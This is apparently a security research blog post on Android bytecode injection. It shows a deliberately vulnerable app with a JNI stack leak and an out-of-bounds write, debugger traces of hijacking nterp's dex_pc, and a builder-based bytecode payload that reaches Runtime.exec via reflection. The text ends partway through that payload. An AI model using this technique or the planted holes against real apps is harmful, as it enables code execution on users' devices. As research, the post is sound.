Bytecode Injection (Part 3)
With all the basics out of the way, this blog post shows the first bytecode-based exploitation technique on Android: bytecode injection! This opens the door to many interesting exploits, where injected bytecode can function as an all-in-one solution or as an intermediate stage.
In order to fully understand this technique, it is recommended to read the introductory blog posts first! As of writing, there is no public information on this topic except for the Android source code.
Motivation
When exploiting a memory error, several security mechanisms must be bypassed. These include, but are not limited to, DEP/N^X, ASLR, RELRO, canaries, and, if you are unlucky, ShadowStack, CFI and SafeStack. Notice that these security mechanisms were not developed all at once, but rather one by one in response to emerging exploitation techniques. For example, native code injection on the stack caused the stack to be mapped with rw- instead of rwx. Another example is ASLR being a response to return-into-libc and ROP. This is called the arms race in binary exploitation, where a response from the offensive security community triggers a response from the defensive security community and vice versa.
Unfortunately, native code is not the only resource that can be executed. Notice that native code is basically interpreted by the CPU. With that in mind, other interpreters can be investigated and analysed for whether they allow particular exploitation techniques. In this blog series, Android’s interpreter nterp is analysed for parallels to the exploitation techniques of native code.
The general motivation for why other interpreters are interesting in the context of exploitation techniques is simple: most security mechanisms are interpreter-specific, i.e. specific to the execution environment (architecture, OS, …). For example, DEP/N^X enforces that pages are never rwx (for the sake of the example, ignore JIT). Hence, native code injection is not feasible. However, changing the interpreter to nterp also changes the entire execution environment an attacker is working with. As we see later on, nothing prevents an attacker from injecting and executing bytecode. In other words, most security mechanisms for one interpreter do not generalize to other interpreters.
The Problems
Although impossible to prove with concrete references, I claim that nterp does not distinguish data and code. In other words, whatever the dex_pc is set to is interpreted. This is exactly what happened decades ago with native code! As in the early days of binary exploitation, given the ability to redirect control flow through a memory error, nterp can be forced to execute whatever an attacker desires.
Consider the following example. In a setting where an attacker gets access to a stack pointer and the ability to repeatedly exploit a stack-buffer index out-of-bounds write, it is possible to construct an exploit with bytecode. Moreover, directly using classical native-level techniques like ROP seems infeasible, because ROP needs leaks of executable memory regions. So, bytecode injection opens new avenues for exploitation!
While the above example works for a remote attacker, a local attacker is not even constrained by ASLR, because of Android’s fork server architecture. For a local attacker, this enables ROP in the above example and also boosts bytecode injection, because a lot of data is identical across apps.
Sample App
For this blog post, we construct a simple, deliberately vulnerable app with
- a repeatable stack-buffer index out-of-bounds write primitive, and
- a single stack address leak.
The idea is to create a scenario where e.g. ROP is infeasible and bytecode injection is simple. Not only does this approach ease understanding the nuances of bytecode-based exploitation, but it also shows that bytecode injection is not superfluous, i.e. it is a new tool in an attacker’s toolbox.
Notice that the app assumes a remote attacker, which is facilitated using simple socket I/O. In practice, an attacker may serve a malicious website that exploits a bug in V8 or perform a MITM attack on the communication of the target app and a backend server. Now, consider the following, relevant app snippets.
private void run() {
while (true) {
try {
Log.d(TAG, "Initializing server....");
this.initServer();
Log.d(TAG, "Setting up connection....");
this.setupConnection();
// Send leak
this.writeLong(MainActivity.leakStack());
// Loop until user wants to exit
while (this.readBool()) {
// Receive index and value for stack oob
MainActivity.writeIndexed(this.readInt(), this.readLong());
}
} catch (final IOException e) {
e.printStackTrace();
} finally {
this.close();
}
if (!stayAlive) {
break;
}
Log.d(TAG, "Restarting server socket....");
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
new Thread(this::run).start();
}
}
public static native long leakStack();
public static native void writeIndexed(int index, long value);
Below are the vulnerable native methods invoked in the above Java code. The memory errors, i.e. a single stack pointer leak and a repeatable stack-buffer index out-of-bounds write, manifest at the JNI layer.
extern "C"
JNIEXPORT jlong JNICALL
Java_com_poc_poc_1remote_MainActivity_leakStack(JNIEnv *env, jclass clazz) {
uint64_t i;
return (uint64_t)&i;
}
extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
jint index, jlong value)
__attribute__ ((optnone)) {
uint64_t i;
uint64_t *buffer = &i;
buffer[index] = value;
}
For some reason, optimizations for writeIndexed had to be disabled, probably because some data-flow analysis in the compiler realized that the code does not really do anything meaningful, i.e. it has no (direct) outputs. However, this suffices for the purpose of proving that bytecode injection is possible.
With the above setup, a remote attacker can connect to the vulnerable app and repeatedly write on the stack. Moreover, an attacker is able to construct data structures and references to these structures on the stack, yielding a powerful primitive especially for data-oriented attacks.
Building the app in release mode with default Android Studio settings yields an .apk file, which is actually a .zip file.
$ unzip app-release.apk
$ ls
AndroidManifest.xml assets classes.dex DebugProbesKt.bin kotlin lib META-INF res resources.arsc
There is only a single classes.dex file that must account for all Java code in the app. Moreover, the classes.dex file must contain some of the framework-related bytecode, types etc. required to launch the app. Therefore, the context of e.g. MainActivity::run is classes.dex. In fact, classes.dex holds a lot more types and methods than are used to program the sample app, as a quick .dex file analysis reveals.
> file --file unpacked_poc_remote/classes.dex --type DEX
classes.dex> list types --regex java/lang/Runtime
[Index = 0x1507]: java/lang/Runtime
[Index = 0x1508]: java/lang/RuntimeException
classes.dex> list methods --regex "Runtime::getRuntime"
[Index = 0xa6ee]: java/lang/Runtime java/lang/Runtime::getRuntime()
Before delving into exploitation, let’s see how the native methods are invoked by MainActivity::run. To increase readability, Lcom/poc/poc_remote/MainActivity is replaced with LMainActivity, where L indicates an object type, and some formatting is done.
classes.dex> list methods --regex "MainActivity::run"
[Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
private void MainActivity::run()
[Index = 0xa51d]:
void MainActivity::run()
classes.dex> decompile method --index 0xa51d
[Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
private void MainActivity::run()
...
001e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->setupConnection()V
0024: INVOKE_STATIC {}, METHOD:LMainActivity;->leakStack()J
002a: MOVE_RESULT_WIDE v0
...
003e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readInt()I
0044: MOVE_RESULT v0
0046: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readLong()J
004c: MOVE_RESULT_WIDE v1
004e: INVOKE_STATIC {v0, v1, v2}, METHOD:LMainActivity;->writeIndexed(I,J)V
0054: GOTO +-17
...
Basically, invocations of MainActivity::leakStack and MainActivity::writeIndexed use the invoke-static instruction. This is not surprising, because both methods are declared using the static keyword. The third register v2 passed to writeIndexed may look odd at first, but the long argument is a wide value that occupies the register pair v1 and v2, which is also why the result of readLong is moved with MOVE_RESULT_WIDE v1. Overall, bytecode is used to execute native methods, and thus execution must eventually continue in bytecode after the native methods are done executing.
Note: Branch offsets are in terms of code units, where one code unit is two bytes. In the above code snippet, GOTO +-17 actually references 0x54 + 2 * (-17) = 0x32. In general, each instruction occupies a whole number of code units, which means instruction offsets and addresses are always two-byte aligned!
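The arithmetic in the note can be reproduced with a few lines of Python. This is only a sketch of the calculation; the helper name branch_target is made up for illustration and is not part of any tool used in this post.

```python
CODE_UNIT_SIZE = 2  # bytes per code unit


def branch_target(instruction_offset: int, relative_units: int) -> int:
    """Byte offset a relative branch lands on.

    instruction_offset is the byte offset of the branch instruction itself,
    relative_units is the signed branch offset in code units.
    """
    return instruction_offset + CODE_UNIT_SIZE * relative_units


# GOTO +-17 located at byte offset 0x54 in MainActivity::run
target = branch_target(0x54, -17)
print(hex(target))  # 0x32
```

The result is always even as long as the branch instruction itself sits at an even offset, which matches the alignment remark above.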
Bytecode Injection
From a previous blog post, we know that the bytecode return address lies on the stack. So, the layout of nterp and JNI stack frames can be used to identify what critical data is in close proximity to the oob write. Below is an excerpt from a particular app execution.
gef➤ canary
[+] The canary of process 9862 is at 0x7ff247af28, value is 0xe009ee421ed97f00
gef➤ i r sp
sp 0x7c0fe66620 0x7c0fe66620
gef➤ hexdump qword $sp --size 0x28
0x7c0fe66620 │+0x0000 0x0013000000000000 // <-- $sp
0x7c0fe66628 │+0x0008 0x0000007c0fe66650
0x7c0fe66630 │+0x0010 0x0013000000000000
0x7c0fe66638 │+0x0018 0x0000020000000000
0x7c0fe66640 │+0x0020 0x0000007f27664480
0x7c0fe66648 │+0x0028 0xb400007d48b969f0
0x7c0fe66650 │+0x0030 0x0000000000000000
0x7c0fe66658 │+0x0038 0x66f0649020037d8d // Stack canary
0x7c0fe66660 │+0x0040 0x0000007c0fe66758 // Old base pointer (x29)
0x7c0fe66668 │+0x0048 0x0000007c14c741ac // Return address (x30)
0x7c0fe66670 │+0x0050 0x0000007f27664480 // ArtMethod* <---- END OF JNI FRAME
0x7c0fe66678 │+0x0058 0x0000007c0fe66748 // Padding? (Vrefs of calling method)
0x7c0fe66680 │+0x0060 0x0000000000000000 // Padding
0x7c0fe66688 │+0x0068 0x0000000000000000 // Padding? Expected d0-d7
0x7c0fe66690 │+0x0070 0x0000000000000000 // x1
0x7c0fe66698 │+0x0078 0x0000000000000000 // x2
0x7c0fe666a0 │+0x0080 0x0000000000000000 // x3
0x7c0fe666a8 │+0x0088 0x0000000000000000 // x4
0x7c0fe666b0 │+0x0090 0x0000000000000000 // x5
0x7c0fe666b8 │+0x0098 0x0000000000000000 // x6
0x7c0fe666c0 │+0x00a0 0xb400007df8b82a10 // x7
0x7c0fe666c8 │+0x00a8 0x0000000000000000 // Marking Register (MR, x20)
0x7c0fe666d0 │+0x00b0 0xb400007df8b82ad0 // Suspend (x21)
0x7c0fe666d8 │+0x00b8 0x0000007c147a64be // dex_pc_ptr (PC, x22)
0x7c0fe666e0 │+0x00c0 0x0000007c14a867f3 // Current Instruction (INST, x23)
0x7c0fe666e8 │+0x00c8 0x0000007c87400880 // Table of bytecode handlers (IBASE, x24)
0x7c0fe666f0 │+0x00d0 0x0000007c0fe66748 // VRefs (REFS, x25)
0x7c0fe666f8 │+0x00d8 0x0000007c0fe66758 // x26 (informally: vregs)
0x7c0fe66700 │+0x00e0 0x0000007c0fe66748 // x27
0x7c0fe66708 │+0x00e8 0x0000007c0fe66770 // x28
0x7c0fe66710 │+0x00f0 0x0000007c0fe66758 // FP (x29)
0x7c0fe66718 │+0x00f8 0x0000007c87409aa0 // Return address (x30)
0x7c0fe66720 │+0x0100 0x0000007f27664440 // ArtMethod* <---- END OF NTERP FRAME
0x7c0fe66728 │+0x0108 0x0000007f276071e0 // ArtMethod*
0x7c0fe66730 │+0x0110 0x0000007c147a62a8 // Alignment? may be a dex pc
0x7c0fe66738 │+0x0118 0x0000007c147a64be // dex_pc_ptr
0x7c0fe66740 │+0x0120 0x0000007c0fe66770 // Caller Frame Pointer (FP)
0x7c0fe66748 │+0x0128 0x0000000000000000 // Vrefs
0x7c0fe66750 │+0x0130 0x12f8084800000000
0x7c0fe66758 │+0x0138 0x0000000000000200 // Vregs
0x7c0fe66760 │+0x0140 0x12f8084800130000
Surprisingly, the JNI frame is slightly modified, as the above instance does not contain spilled floating point registers d0 to d7. However, as the comment in the JNI frame states, only a generic JNI frame is described, not concrete frames for every possible invocation scenario. An interesting observation is that gef claims the canary is 0xe009ee421ed97f00, but the disassembly of writeIndexed suggests the canary is 0x66f0649020037d8d. Apparently, Android’s Bionic library uses random canaries, which also seems to apply to Android’s runtime. Further, there are two instances of a dex_pc_ptr! From top to bottom, the first one is part of the spilled registers in the JNI frame, so it will be put back into x22 upon return to the calling method. The second one seems to be stored and managed in the nterp frame. Maybe this is used to ensure that x22 can be restored on function invocations where x22 is not spilled.
Let’s verify that bytecode execution continues at whatever value is stored in the spilled x22 on the stack. Basically, we can overwrite the value with something arbitrary, like 0x4242424242424242!
gef➤ set *(unsigned long long*)0x0000007c0fe666d8=0x4242424242424242
gef➤ c
Continuing.
Thread 20 "Thread-2" received signal SIGSEGV, Segmentation fault.
...
$x22 : 0x4242424242424242 ("BBBBBBBB"?)
...
→ 0x7c87409ac0 <nterp_helper+1984> ldrh w23, [x22, #6]! // x23 = xINST (next opcode)
0x7c87409ac4 <nterp_helper+1988> and x16, x23, #0xff // x16 = first byte of next instruction
0x7c87409ac8 <nterp_helper+1992> add x16, x24, x16, lsl #7 // x16 = IBASE + opcode * <bytecode handler size>
0x7c87409acc <nterp_helper+1996> br x16 // branch to handler
So, nterp tries to use the spilled register value to derive the next bytecode instruction. Thus, overwriting this value enables an attacker to redirect bytecode control flow to any location. Most importantly, bytecode execution can be pivoted to a controlled location, in this case the stack. Of course, either the dex_pc_ptr must be set to addr_payload-6 or the first three instructions should be NOPs to account for the added 6 in the faulting instruction, i.e. the size of the invoke-static instruction used to invoke writeIndexed.
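The two options for compensating the added 6 bytes, as well as the handler lookup seen in the disassembly, can be sketched in Python as follows. The function names are hypothetical, and the handler size of 128 bytes is read off the lsl #7 in the faulting sequence of this particular build.

```python
INVOKE_SIZE = 6        # bytes; size of the invoke-static that called writeIndexed
HANDLER_SIZE = 1 << 7  # bytes per handler slot, taken from "lsl #7" above
NOP = b"\x00\x00"      # a nop is a single code unit with opcode 0x00


def dex_pc_for_payload(addr_payload: int) -> int:
    """Option 1: value for the spilled x22 so that x22 + 6 == addr_payload."""
    return addr_payload - INVOKE_SIZE


def nop_prefix() -> bytes:
    """Option 2: keep x22 == addr_payload and let nterp skip over three NOPs."""
    return NOP * (INVOKE_SIZE // len(NOP))


def handler_address(ibase: int, code_unit: int) -> int:
    """Model of the dispatch: IBASE + opcode * handler size."""
    opcode = code_unit & 0xFF
    return ibase + opcode * HANDLER_SIZE


# IBASE (x24) from the stack dump above, opcode 0x71 is invoke-static
print(hex(handler_address(0x7C87400880, 0x0071)))  # 0x7c87404100
```

Either option works for this call site only; a different hijacked invoke instruction may have a different size.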
With the ability to control where nterp continues execution, it remains to figure out what to execute.
Building a Bytecode Payload
First of all, the goal must be clarified. In this case, the goal is command execution in the context of the vulnerable app using only bytecode. However, gaining native code execution using bytecode as an intermediate stage to set up e.g. the stack is also possible. Command execution is chosen, because it involves calling at least one legitimate method. Therefore, showing that command execution is possible also proves that bytecode injection is capable of invoking normal library or application-specific methods, despite coming from a memory error. For simplicity, we try to get the following Java code directly in bytecode.
Runtime.getRuntime().exec("log Hello");
Naively translating this to bytecode, e.g. by creating a PoC app, building it and decompiling the .apk file or using d8, yields the first payload version.
classes.dex> list methods --regex Runtime::getRuntime
[Offset = 0x0]: classes.dex
[Index = 0xa254]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "MainActivity::simpleShellcode"
[Offset = 0x0]: classes.dex
[Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
private void MainActivity::simpleShellcode()
[Index = 0xa097]:
void MainActivity::simpleShellcode()
classes.dex> decompile method --index 0xa097
[Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
private void MainActivity::simpleShellcode()
0000: INVOKE_STATIC {}, METHOD:LRuntime;->getRuntime()LRuntime;
0006: MOVE_RESULT_OBJECT v1
0008: CONST_STRING v0, STRING:"log Hello"(14)
000c: INVOKE_VIRTUAL {v1, v0}, METHOD:LRuntime;->exec(LString;)LProcess;
0012: RETURN_VOID
With such a payload at hand, one may be tempted to copy it over and try it! However, as another app is used to construct this payload, type and method indices are most certainly incorrect. For example, invoke-static invokes the Runtime::getRuntime method with index 0xa254. From a previous section it is known that the sample app uses Runtime::getRuntime with index 0xa6ee. Therefore, these indices are incompatible. The same holds for the String constant "log Hello". Most certainly the vulnerable app does not even contain such a String constant! Therefore, to get command execution using Runtime.getRuntime().exec("..."), we need to construct a payload that is more dynamic. To that end, we strive for the following properties:
- dynamic String instances
- dynamic method invocation
Using a different app is helpful to get the overall payload layout and avoids having to deal with e.g. register allocations. However, a context is often app-specific, which must be considered during payload construction.
Dynamic Strings
As discussed in a previous blog post, the instruction fill-array-data can be used to fill an array with data directly located inside the bytecode. So, long story short, an arbitrary char[] can be constructed using fill-array-data. For this to work, an attacker needs to know the type index of char[]. Luckily, the char[] type is used frequently, so it most likely resides in any .dex file we encounter. For a start, the payload looks like below:
new-array v0, <length>, char[]
fill-array-data v0, +<byte offset//2>
...
[fill-array-data-payload]
ident=0x0300
element_width=0x2
size=len(command)
data=[ command[0], ..., command[-1] ]
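To make the payload layout above concrete, here is a minimal Python sketch that serializes a fill-array-data-payload for a char[]. It follows the field order shown above (ident, element width, size, data) with little-endian encoding; the function names are chosen for illustration only.

```python
import struct

FILL_ARRAY_DATA_IDENT = 0x0300


def fill_array_data_payload(element_width: int, data: bytes) -> bytes:
    """Serialize ident (u16), element_width (u16), size (u32) and the raw data."""
    if element_width <= 0 or len(data) % element_width != 0:
        raise ValueError("data length must be a multiple of element_width")
    size = len(data) // element_width
    payload = struct.pack("<HHI", FILL_ARRAY_DATA_IDENT, element_width, size) + data
    if len(payload) % 2:
        payload += b"\x00"  # keep the table a whole number of code units
    return payload


def char_array_payload(text: str) -> bytes:
    """A Java char is 2 bytes wide, so the text is encoded as UTF-16LE."""
    return fill_array_data_payload(2, text.encode("utf-16-le"))


print(char_array_payload("exec").hex())
# 0003020004000000650078006500630000 without the trailing byte pair, i.e.
# header 00 03 | 02 00 | 04 00 00 00 followed by 'e' 'x' 'e' 'c' as 16-bit values
```

The offset passed to fill-array-data then has to point at the first byte of this table, measured in code units relative to the instruction.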
From now on, assume an attacker has a char[] instance describing a command, like "log Hello". The next step is to construct a String from a char[]. On Android, StringBuilder is the type of choice. Again, it is used so frequently that every .dex file is expected to contain the corresponding type. The main challenge is whether StringBuilder::append(char[]) exists. In case of the vulnerable app it does, but this may not be the case for another app. If there is no way to construct a String from bytecode, an attacker can also inject a fake String object (see next post regarding bytecode reuse). Continuing with the StringBuilder, consider the following analysis:
classes.dex> list types --regex "StringBuilder"
[Index = 0x150f]: StringBuilder
classes.dex> list methods --regex "StringBuilder::append"
[Index = 0xa750]: StringBuilder StringBuilder::append([C)
classes.dex> list methods --regex "StringBuilder::<init>"
[Index = 0xa741]: void StringBuilder::<init>()
classes.dex> list methods --regex "StringBuilder::toString"
[Index = 0xa75d]: String StringBuilder::toString()
As the name suggests, StringBuilder::<init>() is the constructor of StringBuilder that does not take any parameters. In Java, invoking this constructor is done via new StringBuilder(). Overall, the following Java snippet describes what we try to do directly in bytecode:
char[] c = new char[] {'l', 'o', 'g', ' ', 'H', 'e', 'l', 'l', 'o'};
StringBuilder b = new StringBuilder();
b.append(c);
String command = b.toString();
Putting together all the pieces and equipped with the bytecode documentation and a sample app for payload creation, the following bytecode can be constructed:
0000: CONST_16 v0, #+<len(command)>
0004: NEW_ARRAY v0, v0, TYPE:char[]
0008: FILL_ARRAY_DATA v0, +<offset to command data // 2>
000e: NEW_INSTANCE v1, TYPE:StringBuilder
0012: INVOKE_DIRECT {v1}, METHOD:StringBuilder-><init>()
0018: INVOKE_VIRTUAL {v1, v0}, METHOD:StringBuilder->append(char[])
001e: INVOKE_VIRTUAL {v1}, METHOD:StringBuilder->toString()
0024: MOVE_RESULT_OBJECT v2
...
offset command data: [fill-array-data-payload]
After the above bytecode is executed, v2 contains a reference to a String object with contents "log Hello". Notice that this bytecode is independent of the String’s semantics, i.e. this is a generic approach for constructing a String instance from a char[] and not specific to a system command! The only components that need to change for a new String are the length fields and the array contents. Of course, one may have to use new vregs to prevent existing vregs from being clobbered.
Note: Calling the constructor on a newly created instance is sometimes optional. If the goal is merely to create a valid object, then one may use new-instance alone, which means the index of the constructor method can be ignored. Of course, using the object later on may cause unexpected behaviour, including crashes.
Problem with String Constructors
One might ask why StringBuilder::append(char[]) is preferred over String::<init>(char[]). This is motivated by the fact that String constructors are disabled on Android. At least the source code suggests that StringFactory should be used instead of the String type directly:
public String(char value[]) {
// BEGIN Android-changed: Implemented as compiler and runtime intrinsics.
/*
this(value, 0, value.length, null);
*/
throw new UnsupportedOperationException("Use StringFactory instead.");
// END Android-changed: Implemented as compiler and runtime intrinsics.
}
Therefore, we directly use the StringBuilder type, also because it is used frequently and easy to use. Notice that although String constructors cannot be easily used, this does not imply that the String type occurs less frequently!
Dynamic Method Invocation
The problem to solve is as follows. The goal is to call Runtime.getRuntime().exec(command), but it cannot be assumed that the context of the bytecode provides the method indices for getRuntime and exec. Actually, Runtime.getRuntime() is very common: it occurs in the context, although the method and the Runtime type are not explicitly used in the vulnerable app:
classes.dex> list types --regex "Runtime"
[Index = 0x1507]: Runtime
classes.dex> list methods --regex "Runtime::getRuntime"
[Index = 0xa6ee]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "Runtime::exec"
classes.dex>
Unfortunately, Runtime::exec is not very common. Luckily, Java provides a feature called reflection. Obviously, the name of the method to be invoked is known, i.e. "exec". So, in Java, dynamically resolving the method looks like so:
Runtime.getRuntime().getClass().getDeclaredMethod("exec", new Class[] { String.class });
As can be seen in the above examples, including dynamic String creation, successful bytecode creation involves a lot of creativity and thinking outside the box to find semantically fitting bytecode instruction sequences that use as few context-specific resources as possible. While it is possible to use Java code to construct the initial bytecode layout, indices etc. must be adjusted to fit the context. Bytecode generated from Java code may use e.g. types that are not available in the context.
The String type is also very common, so it can be assumed to be available in all .dex files and thus in every context an attacker encounters. With all that, the bytecode can be seen below. Notice that v6 := "exec".
003a: INVOKE_STATIC {}, METHOD:Runtime->getRuntime()
0040: MOVE_RESULT_OBJECT v4
0042: INVOKE_VIRTUAL {v4}, METHOD:Object->getClass()
0048: MOVE_RESULT_OBJECT v5
0052: CONST_4 v7, #+1
0054: NEW_ARRAY v7, v7, TYPE:[Class
0058: CONST_4 v8, #+0
005a: CONST_CLASS v9, TYPE:String
005e: APUT_OBJECT v9, v7, v8
0062: INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Class->getDeclaredMethod(String,Class[])
An alternative approach may be to use Runtime.class.getDeclaredMethod(...). However, we need the instance of Runtime for invocation of exec. This approach may save us the getClass invocation, although this would most likely be replaced with an equivalent instruction.
What is left to do is to invoke the resolved method. Of course, invocation depends on what parameters the target method expects. The below code snippet continues with calling exec.
0068: MOVE_RESULT_OBJECT v5
006a: v6 := "log Hello" ...
0072: FILLED_NEW_ARRAY {v6}, TYPE:[LObject;
0078: MOVE_RESULT_OBJECT v6
007a: INVOKE_VIRTUAL {v5, v4, v6}, METHOD:LMethod;->invoke(LObject;,[LObject;)
For simplicity, I omitted the creation of the "log Hello" command.
Observe that dynamically invoking methods using reflection requires knowledge of specific type and method indices, among which are:
- Class[], String and Object[] type indices
- Runtime::getRuntime(), Object::getClass(), Class::getDeclaredMethod(String, Class[]) and Method::invoke(Object, Object[]) method indices
With the above approaches, i.e. dynamic strings and method invocations, it is possible to get command execution using only bytecode from a memory error in a vulnerable app. Or so you may think, but the execution environment is cruel, especially as regards vreg allocations!
Limited, dynamic Vregs
A method specifies the number of vregs it needs in its associated code_item. When executing a method, nterp allocates as many vregs (and vrefs) as specified on the stack. Now, what happens if the hijacked method requested 4 vregs, but the payload uses 10? As has been discussed in a previous blog post, vregs and vrefs have the following properties:
- Vrefs array precedes vregs array on stack.
- Vrefs array is adjacent to vregs array.
- Vrefs and vregs are parallel and entries are semantically linked. For example, vreg v0 is linked to vref r0.
- Vrefs and vregs array accesses are not bounds-checked.
Continuing the example, accessing vregs v0 to v3 is legitimate. However, accessing v4 is problematic. In case the access to v4 is a write, then r4 will most likely also be overwritten. The problem is that r4 aliases the first value after the actual vrefs array, i.e. v0. Therefore, if something is stored into v0 and then e.g. a constant is written to v4, then v0 will be modified, in this case set to 0. Also, the first 32-bit value after vregs is changed to be the constant assigned to v4. This has the neat side effect that an attacker can fully read and write stack values located after vrefs and vregs, enabling attacks like JITROP. From a bytecode perspective, depending on the number of registers used in the payload, this is problematic, because registers holding important data like the Runtime instance may be clobbered.
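The clobbering described above can be replayed on a toy model. The following Python sketch treats the stack as a flat list of 32-bit words and assumes, as the text describes, that a constant write stores the value into the vreg and 0 into the linked vref. It is a simplified model for illustration, not nterp itself.

```python
N = 4  # vregs requested by the hijacked method

MARKER = 0xDEADBEEF  # stands in for unrelated stack data after the vregs
# Layout in 32-bit words: N vrefs, then N vregs, then whatever follows.
stack = [0] * N + [0] * N + [MARKER] * N
REFS_BASE = 0
REGS_BASE = N


def set_vreg_const(words, index, value):
    """Model of a non-object write: the vreg gets the value, the vref gets 0."""
    words[REGS_BASE + index] = value
    words[REFS_BASE + index] = 0


def get_vreg(words, index):
    return words[REGS_BASE + index]


set_vreg_const(stack, 0, 0x1337)  # legitimate write to v0
set_vreg_const(stack, 4, 0x42)    # out-of-bounds write to v4

print(hex(get_vreg(stack, 0)))    # 0x0, because r4 aliases v0
print(hex(stack[REGS_BASE + N]))  # 0x42, first word after the vregs array
```

The same aliasing applies to every index beyond N - 1, which is what the remapping in the next paragraphs works around.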
This is where math can save the day! Say the hijacked method requested N vregs. Then, the first overlap happens at v<N>, because this may also set r<N>, which overlaps with v0. So, to prevent overflowing into the vregs, an access to v<N> can be set to v<N+N>. This skips over the entire vregs array, and thus reinterprets the region after vregs as a fresh vrefs-vregs array pair. Hence, the mapping is N -> N+N, but what happens in case v<N+1> or v<N+2> are accessed? And what about v<N+N+N+2>? To resolve this problem, observe that each block, i.e. vregs accesses that do not overflow into the following block, is of size N * 2. The first block consists of the original vrefs and vregs, in that order, each of length N. Say the payload needs M vregs to work. Then the number of blocks is at most k := M // N + 1, where // is integer division. Now, if vreg v<X> with 0 <= X < M is to be accessed, then compute the block id X // N and the offset into the block X % N. The actual vreg access is then v<(X // N) * (N * 2) + (X % N)>. To summarize,
- X // N: Block id
- N * 2: Block size in register entries
- X % N: Offset within a block
Consider the following visualization for the case where the payload uses 10 vregs, the hijacked method only allocated memory for 4 vregs, and the payload tries to access vreg v4. Of course, whatever data overlaps with the artificial blocks is corrupted. Hence, care must be taken when using this approach. Luckily, blocks can be shifted up the stack until no critical data is overwritten.
With a simple function, this can be abstracted away, so we never have to do math again:
v = lambda i: (i // available_vregs) * (2 * available_vregs) + (i % available_vregs)
v0 = v(0)
v1 = v(1)
v2 = v(2)
v3 = v(3)
v4 = v(4)
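As a worked example of the mapping, the following self-contained Python snippet prints the remapped indices for the case discussed above, i.e. N = 4 available vregs and a payload that needs M = 10. The name remap_vreg is only used here for illustration.

```python
def remap_vreg(x: int, n: int) -> int:
    """Map logical payload vreg x to a physical index that skips vrefs overlaps."""
    block_id, offset = divmod(x, n)
    return block_id * (2 * n) + offset


N, M = 4, 10
mapping = [remap_vreg(x, N) for x in range(M)]
print(mapping)     # [0, 1, 2, 3, 8, 9, 10, 11, 16, 17]
print(M // N + 1)  # 3
```

So the logical v4 from the example becomes the physical v8, and the payload touches three blocks of 2 * N entries each.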
The Payload
Finally, with all caveats out of the way, the final payload can be constructed. It is beneficial to implement a BytecodeBuilder, which dynamically builds bytecode based on the documentation. This eases testing and constructing different kinds of payloads! In this case study, the payload can be fully expressed like below. Note that the comments do not always show the correct indices, lengths and offsets. Most of these values are computed dynamically or change with the payload size and layout. Also, another app is used to generate the payload layout and avoid having to deal with register allocations. That app is forced to use the tricks for dynamic strings and method invocations at the Java level.
builder = BytecodeBuilder(type_map={
'char[]': char_array_index,
'StringBuilder': stringbuilder_index,
'Class[]': classarray_index,
'String': string_index,
'Object[]': objectarray_index,
'Object': object_index,
})
# [Index = 0x5, Offset = 0x31c, Num Regs = 0xa]: private static void com/poc/shellcode/MainActivity::shellcode()
return (builder
# 0000: 13 00 12 00 CONST_16 v0, #+18
.const_16(v0, len(command))
# 0004: 23 00 13 00 NEW_ARRAY v0, v0, TYPE:[C
.new_array(v0, v0, 'char[]')
# 0008: 26 00 3e 00 00 00 FILL_ARRAY_DATA v0, +62
.fill_array_data(v0, 65)
# 000e: 22 01 0d 00 NEW_INSTANCE v1, TYPE:Ljava/lang/StringBuilder;
.new_instance(v1, 'StringBuilder')
# 0012: 70 10 0b 00 01 00 INVOKE_DIRECT {v1}, METHOD:Ljava/lang/StringBuilder;-><init>()V
.invoke_direct(1, stringbuilder_constructor_index, [v1])
# 0018: 6e 20 0c 00 01 00 INVOKE_VIRTUAL {v1, v0}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
.invoke_virtual(2, stringbuilder_append_chararray_index, [v1, v0])
# 001e: 12 42 CONST_4 v2, #+4
.const_16(v2, 4)
# 0020: 23 22 13 00 NEW_ARRAY v2, v2, TYPE:[C
.new_array(v2, v2, 'char[]')
# 0024: 26 02 46 00 00 00 FILL_ARRAY_DATA v2, +70
.fill_array_data(v2, 65)
# 002a: 22 03 0d 00 NEW_INSTANCE v3, TYPE:Ljava/lang/StringBuilder;
.new_instance(v3, 'StringBuilder')
# 002e: 70 10 0b 00 03 00 INVOKE_DIRECT {v3}, METHOD:Ljava/lang/StringBuilder;-><init>()V
.invoke_direct(1, stringbuilder_constructor_index, [v3])
# 0034: 6e 20 0c 00 23 00 INVOKE_VIRTUAL {v3, v2}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
.invoke_virtual(2, stringbuilder_append_chararray_index, [v3, v2])
# 003a: 71 00 09 00 00 00 INVOKE_STATIC {}, METHOD:Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
.invoke_static(0, getruntime_index, [])
# 0040: 0c 04 MOVE_RESULT_OBJECT v4
.move_result_object(v4)
# 0042: 6e 10 08 00 04 00 INVOKE_VIRTUAL {v4}, METHOD:Ljava/lang/Object;->getClass()Ljava/lang/Class;
.invoke_virtual(1, object_getclass_index, [v4])
# 0048: 0c 05 MOVE_RESULT_OBJECT v5
.move_result_object(v5)
# 004a: 6e 10 0d 00 03 00 INVOKE_VIRTUAL {v3}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
.invoke_virtual(1, stringbuilder_tostring_index, [v3])
# 0050: 0c 06 MOVE_RESULT_OBJECT v6
.move_result_object(v6)
# 0052: 12 17 CONST_4 v7, #+1
.const_16(v7, 1)
# 0054: 23 77 14 00 NEW_ARRAY v7, v7, TYPE:[Ljava/lang/Class;
.new_array(v7, v7, 'Class[]')
# 0058: 12 08 CONST_4 v8, #+0
.const_16(v8, 0)
# 005a: 1c 09 0c 00 CONST_CLASS v9, TYPE:Ljava/lang/String;
.const_class(v9, 'String')
# 005e: 4d 09 07 08 APUT_OBJECT v9, v7, v8
